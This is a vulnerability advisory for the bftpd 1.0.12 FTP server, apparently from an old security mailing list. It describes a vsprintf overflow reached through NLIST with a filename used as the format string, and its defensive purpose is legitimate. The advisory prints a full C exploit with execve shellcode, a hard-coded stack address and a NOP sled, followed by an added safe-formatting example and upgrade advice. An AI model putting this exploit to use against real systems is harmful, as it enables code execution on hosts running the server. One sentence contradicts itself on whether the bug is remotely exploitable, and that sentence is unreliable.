COMMAND
bftpd
SYSTEMS AFFECTED
bftpd 1.0.12
PROBLEM
'asynchro' found the following. There is an unsafe vsprintf call in
bftpd 1.0.12, in the function sendstrf, where the format string is
taken directly from the caller and the output buffer is unbounded:
int sendstrf(int s, char *format, ...) {
    ....
    vsprintf(buffer, format, val);
The function is called from the NLIST command with the directory entry
name (user-controlled data) passed as the format string itself:
    else
        foo = 1;
    sendstrf(s, entry->d_name);
}
This can be used to overflow the buffer of the vsprintf and
execute arbitrary code. The guess is that it can normally be used
for a remote attack because bftpd removes all non-printable
characters from input strings, so it is not possible to
remotely put shellcode in a filename. A demonstrative code is
below.
/*
Creates a filename to exploit the bug in bftpd 1.0.12
Create the file, cwd in the shell directory and nlist the file directory
(sh is executed in the working dir because it is not possible to insert a / in
the filename)
hints by |CyRaX| & Cthulhu
coded by asynchro
www.pkcrew.org
*/
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define BUFSIZE 512
#define NOP 124
int main(void)
{
    int i;
    char *buff;
    char nop = 0x90;
    /* hard-coded stack address used by the original author */
    char addr[] = "\xd4\xf9\xff\xbf";
    /* the filename starts with a width specifier to pad the vsprintf output */
    char command[] = "touch %.260x";
    char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xffsh";
    buff = (char *) malloc(BUFSIZE);
    memset(buff, 0x0, BUFSIZE);
    memcpy(buff, command, sizeof(command));
    /* sizeof(command) copies the terminating NUL, so strncat appends after it */
    strncat(buff, addr, 4);
    strncat(buff, addr, 4);
    for (i = 0; i < NOP; i++)
    {
        strncat(buff, &nop, 1);
    }
    strncat(buff, shellcode, strlen(shellcode));
    /* runs "touch <filename>" in the current directory */
    system(buff);
    return 0;
}
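The root cause above is a filename reaching vsprintf as the format string. The following is an added example, not bftpd's own code, showing the corrected pattern: a hypothetical sendstrf_safe that formats into a bounded buffer with vsnprintf and reports truncation, and an NLIST call site that passes the entry name as a "%s" argument so any conversion specifiers it contains are emitted literally. The buffer size, function names and the sample filenames are assumptions made for this example.

```c
/* Added example (not from the bftpd project): a bounded, format-safe
 * replacement for the sendstrf()/NLIST pattern described in the advisory. */
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define REPLY_MAX 512   /* assumed reply buffer size */

/* Hypothetical fixed sendstrf: vsnprintf stops at the end of `out`,
 * unlike vsprintf, and tells us how long the output would have been.
 * Returns the number of bytes written, or -1 on error or truncation.
 * Sending over the socket is left out; the caller receives the bytes. */
int sendstrf_safe(char *out, size_t outlen, const char *format, ...)
{
    va_list val;
    int n;

    va_start(val, format);
    n = vsnprintf(out, outlen, format, val);
    va_end(val);

    if (n < 0 || (size_t)n >= outlen)
        return -1;          /* would not fit: refuse rather than overflow */
    return n;
}

/* NLIST call site: the directory entry name is data, not a format
 * string, so it is supplied as the argument to "%s\r\n". A name such
 * as "%x%x%n" is therefore copied verbatim instead of being interpreted. */
int nlist_entry(char *out, size_t outlen, const char *d_name)
{
    return sendstrf_safe(out, outlen, "%s\r\n", d_name);
}

/* Stand-alone demonstration on constructed filenames. */
int main(void)
{
    /* constructed sample entry names, including one made of specifiers */
    const char *names[] = { "README", "%x%x%x%n", "%s%s%s%s" };
    char out[REPLY_MAX];
    size_t i;

    for (i = 0; i < sizeof(names) / sizeof(names[0]); i++) {
        int n = nlist_entry(out, sizeof out, names[i]);
        if (n < 0)
            printf("entry too long, not sent\n");
        else
            printf("sent %d bytes: %s", n, out);
    }
    return 0;
}
```

The check on the vsnprintf return value matters as much as the bound itself: a reply that does not fit is dropped with an error instead of being silently cut, which keeps the server from emitting half a line of a directory listing.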
SOLUTION
There were a lot of bugs in version 1.0.12. Most of them had
already been fixed about half a month ago, but no new release
existed at that time. Now that 1.0.13 has been released, everyone
is urged to upgrade.